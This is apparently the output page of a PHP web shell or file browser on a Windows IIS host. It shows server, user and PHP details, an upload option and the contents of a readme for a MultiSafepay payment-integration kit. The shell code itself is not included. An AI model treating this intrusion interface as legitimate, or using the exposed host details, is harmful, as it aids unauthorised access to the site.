HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/SBogers10/deensekroon.komma-mediadesign.nl/wwwroot/multisafepay/readme.txt
General MultiSafepay class to be used for custom implementations.


MultiSafepay.class.php
  Class file. 
    startTransaction()   // does a transaction request (returns payment_url)
    getStatus()          // does a status request      (returns status)
    getGateways()        // does a gateway request     (returns array with gateways (id => name)


MultiSafepay.config.php
  Configuration values


index.php
  Contains a link to pay.php


pay.php
  Uses the MultiSafepay class to start a transaction


notify.php (used in pay.php)
  Use this for payment notifications.
  
  There are two variations:
    - notify.php?type=initial
      this is the notification_url in the transaction request (called at the end of the transaction)
      output will be a link back to the shop
      
    - notify.php
      link for the MultiSafepay back-end for delayed payment notifications
      output should "ok", or an error message if something went wrong

  Generally both variations should update the status in the local database
  
  
return.php (used in notify.php)
  Simple return page.